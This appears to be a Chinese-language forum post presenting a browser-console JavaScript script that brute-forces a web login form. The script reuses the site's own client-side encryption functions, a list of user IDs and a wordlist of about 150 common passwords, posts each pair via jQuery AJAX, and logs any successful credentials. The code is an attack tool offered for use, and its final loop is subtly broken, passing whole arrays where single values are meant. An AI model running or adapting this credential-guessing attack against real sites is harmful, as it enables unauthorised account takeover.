使用js 脚本爆破自定义加密
优势:1. js 加密,再通过js 解密省去了分析加密过程
2 . 异步速度很快
3. 无需部署其它环境,一个浏览器就够了
如网站没引用jquery,须引用外部jquery
以下为代码部分:
// http://192.168.1.9:8000/home/Account/LogOn
// 定义用户名部分
var uids = ["admin","2311","7245","2627","7243","6100","2970","6939","6549","6696","8006","6733","8224","8007","6132"]
// var uids=["admin"]
//定义密码列表
var pass = ["!QAZ6yhn","000000","000000000","0000000000","0000000000000000","0123456789","110120119","111111","111111111","1111111111","1111111111111111","123.mima","123123","123123123","1233211234567","1234.com","1234554321","123456","123456.","123456..","123456789","123456789.","123456789..","1234567890","12345678900","1234567891","12345678910","1234567891234567","1234567899","123456789a","123456789abc","123456789q","123456789qq","123456a","123456aa","123456abc","123456asd","123456q","123456qq","123698745","123abc","1314520520","135792468","1357924680","147258369","1472583690","1qaz!QAZ2wsx@WSX","1qaz#EDC5tgb","1qaz2wsx!QAZ@WSX","1qaz@WSX","1qaz@WSX3edc","1qaz@wsx","2wsx#EDC","3edc$RFV","5201314","5201314520","52013145201314","5841314520","5tgb^YHN","6yhn&UJM","741852963","7708801314520","789456123","7894561230","987654321","9876543210","AAA111...","Aa111111","Abc@1234","Abcd1234","Hello01!","Hema1111","MIMA.123","Qwe123!@#","Welcome123","Welcome1234","a123123","a123456","a12345678","a123456789","a5201314","aa123456","aa123456789","aaa123456","abc123","abc123456","abc123456789","abcd123","abcd1234","abcd123456","aini1314","as123456","asd123","asd123456","asdASD123!@#","asdfghjkl","caonima","fir2k7st","mima..123","mima.123","mima.1234","mima.321","mima.456","mima123.","nopass.1","nopass.2","password1!","q123456","q123456789","qaz123456","qazwsxedc","qazxsw.123","qq123456","qq123456789","qq5201314","qwe123","qwe123456","qwe567,.","qwerty","qwertyuiop","w123456","w123456789","wang123456","woaini","woaini123","woaini1314","woaini1314520","woaini520","woaini521","www123456","z123456","z123456789","zxc123","zxc123.0","zxc123456","zxcvbnm","zxcvbnm123"]
var count = uids.length * pass.length
console.info("INFO: 一共需要请求:"+count+"次\n")
//定义登录接口
var url = "http://192.168.1.9:8000/home/account/LogOn"
//请求主体,及表单部分
function p(url,uid,pass){
// js密码加密部分
enpass = do_encrypt_slim(getmd5str(pass))
$.ajax({
url : url,
type : "POST",
async : false,
data : {
usercode:uid,
password:enpass,
phonecheckword:null
},
success : function(data){
if(data.flag != false){
console.log("%c[+] login successful!\n"+"Loginid:"+uid+"\tpassword:"+pass+"\tusername:\t"+data.username+"\n","color: green")
}else{
console.warn("[-] Login failed !\t当前尝试用户:"+ uid +"\t信息:"+data.msg+"\n")
}
},
timeout: 1000 //防止卡死
});
}
for (uint =0; uint<=uids.length-1;uint++){
for (i = 0; i<=pass.length-1;i++){
p(url,uids,pass);
}
}
效果图
页:
[1]